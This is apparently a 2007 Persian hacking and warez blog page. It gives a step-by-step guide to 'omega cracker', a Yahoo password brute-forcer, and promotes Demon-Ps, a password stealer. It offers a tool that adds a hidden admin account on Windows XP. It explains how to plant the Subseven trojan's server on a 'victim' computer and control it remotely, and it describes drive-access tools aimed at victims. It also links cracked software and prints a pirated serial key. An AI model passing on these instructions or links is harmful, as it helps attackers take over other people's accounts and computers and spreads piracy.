قسمت ۱ که با رنگ قرمز مشخص کردم ؟ تو این قسمت شما آیدی های مورد نظر را می گذارین که بهتون تو قسمت ۵ میگم چطوری بگذارید؟ قسمت ۲ که با رنگ قرمز مشخص کردم ؟ تو این قسمت باید پسوردهایی که می خواهیم امتحان بشن رو می گذاریم که تو قسمت ۶ میگم چطور. قسمت ۳ که با رنگ قرمز مسخص کردم ؟ تو این قسمت ما دوتا تنظیم داریم که من اونا را به ترتیب میگم ؟ ۱ ماله این هست که وقتی پسورد دوتا پیدا کرد مثل مرغ پر کنده دادو هوار کنه . ۲ ماله این هست که پسورد هایی که پیدا میشن به طور اتوماتیک ذخیره کنه. قسمت ۴ که با رنگ قرمز مشخص کردم ؟ تو این قسمت آیدی و پسورد اون را به شما نشون میده که در حقیقت لیست کرک شده است. تو این قسمت دوتا گزینه هست : ۱ برای ذخیره در فایل متنی . ۲ برای پاک کردن لیست . قسمت ۵ که با رنگ قرمز مشخص کردم ؟ در این قسمت هم ۴تا گزینه هست که توضیح میدم ؟ ۱ این گزینه برای بار گذاری آیدی ها است که می خواهیم پسورد های اون ها امتحان بشن که برای بار گذاری باید اول از قبل یه فایل txt documment درست کنیم و آیدی ها رو تویه اون تایپ کنیم و بعد تو برنامه فراخانی کنیم . ۲ این گزینه برای وارد کردن دستی آیدی است. ۳ این گزینه آیدی وارد شده را پاک میکنه . ۴ این گزینه آیدی وارد شده رو از لیست آیدی ها پاک میکنه . قسمت ۶ که با رنگ قرمز مشخص کردم ؟ این قسمت هم ۴ گزینه داره که کارشون مثل قسمت ۵ هست اما با این تفاوت که به جای آیدی باید لیست پسورد داده بشه . قسمت ۷ که با رنگ قرمز مشخص کردم ؟ این قسمت هم بخش آخر این برنامه است ۳ گزینه داره که نیاز نیست بگم خودتون میدونید . دکمه start را فشار بدید تا برنامه فعال بشه و به دنبال پسورد بگرده ؟ اگر یک کم شانس داشته باشید می تونید بعد از ۱۰ یا ۱۵ دقیقه چند تا آیدی هک کنید ؟ ضمنا با قسمت ۸ هم کاری نداشته باشید ؟ نام برنامه :omega cracker دانلود برنامه :omega..zip اینم چندتا بوتر >>>>>download<<<<<< >>>>>>download>>>>>> >>>>>>download>>>>>>>> >>>>>>download<<<<<<
http://rapidshare.com/files/6453247/Lckel5.part2.rar http://rapidshare.com/files/6453259/Lckel5.part3.rar http://rapidshare.com/files/6453263/Lckel5.part4.rar این برنامه هم اخیراً سر زبون همه افتائه که به جای فرونت پیج اومده و میگن یه شباهت هایی به برنامه ادوب دریم ویور هم داره. به هر صورت یه برنامه خوب برای طرحی وب سایت میگم خوب چون مایکروسافت معمولاً کاراش حرف نداره. خوب خودتون دانلود کنید http://danlod.org/v/4944089/Microsoft_Expression_Web_2007_ZWTiSO_danlod.rar.html از تصاوير ديجيتالي خود آلبوم فلاش بسازيد
Flash Album Creator اجازه ي ساخت آلبوم هاي بامزه اي از تصاويرديجيتال خودتونو بهتون ميده. همچنين ميتونين باهاش File Exe فلاش رو بسازيد كاربرداي ديگش هم ساخت صفحات HTML معموليه و حداقل هم بايد عكس ها 640*480 باشه در غير اينصورت خود برنامه عكس ها ميزون ميكنه خلاصه چيزه باحاليه!
 دانلود كنيد با حجم 1.13 مگابايت
name=dT2003 serial=4297-7284-6D9C-0EA1-B21D-F3C3-833B-C752 ساخت آموزش های الکترونیک چندرسانه ای در قالب فایلهای زیبای فلش با Flash Demo Builder http://www.flashdemobuilder.com/play.php?swf=Demonstration&back=product.html دانلود کنید نسخه ی 1.0 را با حجم 23.7 مگابایت
کرک نسخه ی 1.0 از نرم افزار با حجم 7.6 مگابایت1.0 ساخت فيلم آموزشي و فيلم برداري از صفحه مونيتور با ScreenVirtuoso 2.5
پورت اسکنر
این برنامه میتونین یکی از درایو های قربانی رو تو سیستم خودتون دست کاری کنید طرز کارشم اینه که آیژی طرف رو وارد میکنید و نام درایو و سپس کانکتو میزنید ژسورد ورودی برنامه هم هست: سلام
نسخه جدید برنامه Demon-Ps اماده شد.
این برنامه رو یاهو نسخه 5و6و7 و5/7و8و1/8 + نسخه های کرک شده کار می کنه
حدود 99% مشکلات برنامه برطرف شده و همه ی برنامه مجددا کدنویسی شده شیوه کار سرور برنامه تغییر کرده در هر بار Sign In پسوردها فرستاده میشه
این برنامه تمام سورس بوده واز هیچ پلاگینی بهره نمیگیره در ضمن نظر یادتون نره |
|
+ نوشته شده در
پنجشنبه بیست و دوم آذر 1386ساعت 9:17 بعد از ظهر توسط mahyar |
|
|
Only 1.1 MB If you aren`t Admin user HACK Admin Password for Windows XP From Limited Account XP & Become Admin Of Windows Xp Tested & worked Unzip & Run accmaker.exe in windows XP.(no problem if you are guest or Limited user (No admin),Now You are admin,log off & enter XP with your admin account with : Username : Hack Password : (No Password Need) |
|
+ نوشته شده در
پنجشنبه یکم آذر 1386ساعت 2:37 بعد از ظهر توسط mahyar |
|
|
Subseven چگونه کار مىکند؟ بسیار ساده است. اولین بارى که Server.exe را روى کامپیوتر اجرا مىکنید، برنامه در حافظه نصب مىشود و با هر بار راهاندازى مجدد ویندوز، آن نیز راهاندازى مىشود. Sub7.exe برنامه اصلى است که شما براى ارتباط با Server از آن استفاده مىکنید. پارامترهاى خط فرمان شما مىتوانید Server.exe را با پارامترهاى خط فرمان زیر اجرا کنید: Password کلمه عبور براى برقرار ارتباط /PASS:Password مثلاً، "Server.exe/pass:HPass/port:1777" سرویس دهنده را روى پورت 1777 با استفاده از کلمه رمز "HPass" نصب مىکند. |
|
+ نوشته شده در
پنجشنبه یکم آذر 1386ساعت 2:34 بعد از ظهر توسط mahyar |
|
 از Subseven مىتوان به عنوان یک ابزار مدیریت از راه دور یا به عنوان ابزارى براى Hack کردن استفاده نمود. Subseven شامل 3 فایل است: Server.exe، Sub7.exe و EditServer.exe. براى استفاده از Sub7، Server.exe را روى کامپیوتر قربانى اجرا کنید (اینکه چگونه اینکار انجام گیرد بعهده خواننده است). شماره IP او را بیابید و سپس Sub7.exe را از کامپیوتر خودتان اجرا کنید. پس از آن مىتوانید اوقات خوشى با کامپیوتر قربانى داشته باشید. شما مىتوانید قبل از فرستادن Sub7، با استفاده از Editserver.exe، سرویس دهنده را پیکربندى کنید.
|
|
+ نوشته شده در
پنجشنبه یکم آذر 1386ساعت 2:33 بعد از ظهر توسط mahyar |
|
|
صفحه نخست پروفایل مدیر وبلاگ پست الکترونیک آرشیو وبلاگ عناوین مطالب وبلاگ |
| درباره وبلاگ |
ورود شما را به اين وبلاگ خوش آمد عرض مي كنم . اميدوارم مطالب اين وبلاگ مورد استفاده ي شما قرار گيرد . نقطه نظرات خود را براي بهبود وبلاگ مطرح نماييد. اماده هر گونه تبادل لینک و لوگو هستیم.برای این منظور هم نظر بدهید ...
برای بهبود کار در وبلاگ و رفع نقص ها نظرات خود را در بخش نظر ها بنویسید. (اگه کاری . انتقادی. مشکلی جیزی داشتید ما در خدمتیم.) |
| آرشیو موضوعی |
|
آموزش فلش بوت کتاب های الکترونيکی کد ويروس اموزش وبلاگنويسی طراحی وب آمورش ساخت فیلتر شکن کاربردی هک آموزش هک ترفند یاهو آهنگ های صوتی و کلیپ تصویری |
|
RSS
|
با این برنامه فقط با دادن IP طرف و نام درایو طرف میتونید درایو طرف رو بیارید تو My Computer خودتون فقط باید ویندوز طرف رمز نداشته باشه و Service Pak 1 باشه 
